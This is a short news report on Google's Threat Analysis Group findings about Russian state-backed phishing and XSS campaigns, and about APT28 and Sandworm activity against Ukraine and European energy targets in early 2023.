Google’s Threat Analysis Group (TAG) has been engaged in the monitoring and prevention of cyberattacks sponsored by the Russian state targeting Ukraine’s essential infrastructure in 2023.
Elite hackers affiliated with Russia’s military intelligence service have been associated with extensive phishing campaigns aimed at gathering intelligence and influencing public discourse related to the war by targeting hundreds of users in Ukraine.
The group, known as FROZENLAKE, has been closely monitored by TAG, which revealed that the attacks continue to focus on targeting webmail users in Eastern Europe, following the group’s activities in 2022.
The threat actor, also known by aliases as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, has been highly active since 2009, targeting media, governments, and military entities for espionage.
According to Google’s report, Ukraine was the primary target of phishing attacks originating from Russia, accounting for approximately 60% of the attacks between January and March 2023.
The primary objectives of these campaigns are intelligence gathering, operational disruptions, and leaking sensitive data.
The perpetrators also use Telegram channels to disseminate information that could damage Ukraine’s interests.
Starting in early February 2023, the latest intrusion set involved the use of reflected cross-site scripting (XSS) attacks on multiple Ukrainian government websites.
These attacks redirect users to phishing domains, allowing the perpetrators to capture their login credentials.
Google’s TAG has identified three significant Russian and Belarusian threat actors who have been particularly active against Ukrainian targets in the first quarter of the year.
The first is Sandworm, also known as “FrozenBarents” by Google, which has been targeting the energy sector in Europe since November 2022.
Notably, the group has launched attacks against the Caspian Pipeline Consortium (CPC).
In recent months, Sandworm has launched several phishing campaigns using fake “Ukroboronprom” websites to target individuals working in the Ukrainian defense industry, users of the Ukr.net platform, and even Ukrainian Telegram channels.
This disclosure comes amid a joint advisory by intelligence and law enforcement agencies from the U.K. and the U.S. warning of APT28’s attacks.
The group has been exploiting an old vulnerability in Cisco routers to deploy malware called Jaguar Tooth.